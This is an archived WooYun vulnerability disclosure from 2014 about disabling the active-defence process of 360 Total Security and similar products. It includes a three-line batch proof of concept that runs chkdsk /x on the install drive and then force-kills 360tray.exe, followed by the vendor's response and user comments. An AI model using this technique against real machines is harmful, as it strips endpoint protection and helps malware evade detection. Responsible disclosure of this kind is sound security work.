破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

轻松干掉360安全卫士主防(不止360哦)

编号78641
Urlhttp://www.wooyun.org/bug.php?action=view&id=78641
漏洞状态厂商已经确认
漏洞标题轻松干掉360安全卫士主防(不止360哦)
漏洞类型拒绝服务
厂商奇虎360
白帽子zhuixing
提交日期2014-10-09 16:27:00
公开日期2015-01-07 16:28:00
修复时间(not set)
确认时间2014-10-10 00:00:00
Confirm Spend1
漏洞标签客户端安全
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank6
漏洞简介
360安全卫士(其实不止360一家)主防就这样被干掉了,简直不可思议!
漏洞细节

经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。
测试使用Windows XP SP3,VMware Workstation 10.0.3。

@echo off
chkdsk /x e:
taskkill /F /IM 360tray.exe /T

POC

未命名-1.gif

修复方案

我等小白岂敢班门弄斧……

状态信息 2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-10: 厂商已经确认,细节仅向厂商公开
2014-10-13: 细节向第三方安全合作伙伴开放
2014-12-04: 细节向核心白帽子及相关领域专家公开
2014-12-14: 细节向普通白帽子公开
2014-12-24: 细节向实习白帽子公开
2015-01-07: 细节向公众公开
厂商回复此问题是在用户进行的特定的特殊安装配置下存在的360防护可能被绕过问题, 对绝大多数使用推荐配置的用户不存在此问题. 感谢提交, 我们会尽快修复这个问题.
回应信息危害等级:中漏洞Rank:6 确认时间:2014-10-10 18:31
Showing 1-44 of 44 items.
评论内容评论人点赞数评论时间

这个家伙专门搞各大杀软公司。

明月影02015-03-09 20:48:00

忽略,然后偷偷的修复.....

Mirror02015-01-13 21:36:00

$$$ 加闪电!!洞主三连发`

Code_Monkey02015-01-08 20:46:00

强制卸载卷,好猥琐的思路

timor02015-01-08 17:35:00

三个$还有闪电>.<

Bird02015-01-07 19:12:00

要逆天!

码农02015-01-07 17:50:00

美金+闪电。。。

laoyao02015-01-07 17:12:00

文件驱动卸载了,保护不起运用了

爱梅小礼02015-01-07 16:54:00

好yd呀,先dismount volume,再kill

f4ckbaidu02015-01-07 16:33:00

太机智了。。。不过这是为什么呢?

mlyKnown02014-11-19 20:59:00

太机智了。。。。。。

blast02014-11-09 23:38:00

我艹,什么情况,视频看到一半,手机所有进程都关了

老和尚02014-11-09 16:29:00

NB!

秋风02014-10-10 22:04:00

大神的世杰 我们小白永远不懂

02014-10-10 19:23:00

看这里,

天噬小然02014-10-10 18:55:00

@scanf 路人甲? 估计要等把 我核对了所有发放记录 最长的一次 29天那我琢磨这乌云毕竟不是漏洞市场 因此发放比较慢等公开

大漠長河02014-10-09 23:24:00

劈死了!怎么没有奖金啊?

scanf02014-10-09 23:19:00

记者拍这里

backtrack丶yao02014-10-09 23:03:00

不愧是路人甲!!!

雷锋02014-10-09 22:23:00

@小表哥 微点没事,但它压根连最单纯的普通加密命令都不拦截呀。

zhuixing02014-10-09 21:17:00

东方微点试过了么。。。

小表哥02014-10-09 21:04:00

和金山那个不知道有何关联

大漠長河02014-10-09 20:12:00

@Finger 同求审

zph02014-10-09 19:47:00

这样也可以

铁蛋火车侠02014-10-09 19:43:00

@Finger 能审核下三个漏洞么,几天了

泳少02014-10-09 19:42:00

看这里

第四维度02014-10-09 19:36:00

这样都可以

s0mun502014-10-09 18:16:00

ccxv,看这里。

magerx02014-10-09 17:40:00

360动作挺快的,官网下载的文件跟前几天测试时下载的都不一样了。

zhuixing02014-10-09 17:36:00

尼玛、吊炸天!!!

Walle02014-10-09 17:27:00

打雷了,mark

ki11y0u02014-10-09 17:24:00

@px1624 你说的那些是杀毒软件?

zzR02014-10-09 17:18:00

好屌的节奏

zeracker02014-10-09 17:14:00

怎么没有qq电脑管家和江民、瑞星之类。。。

px162402014-10-09 17:04:00

DiaoZhaTian

汪哥02014-10-09 16:59:00

非xp2003?

YY-201202014-10-09 16:53:00

不可思议啊

D_in02014-10-09 16:46:00

@MJ0011

xsjswt02014-10-09 16:41:00

我擦。。。怎么回事

GixMore02014-10-09 16:38:00

你们周总说派专人联系我,怎么还没动静

校长02014-10-09 16:37:00

记者拍这里啊

j14n02014-10-09 16:35:00

危害等级:无影响厂商忽略

假马02014-10-09 16:32:00

不可思议 怎么会这样

Finger02014-10-09 16:29:00

前排上央视

校长02014-10-09 16:29:00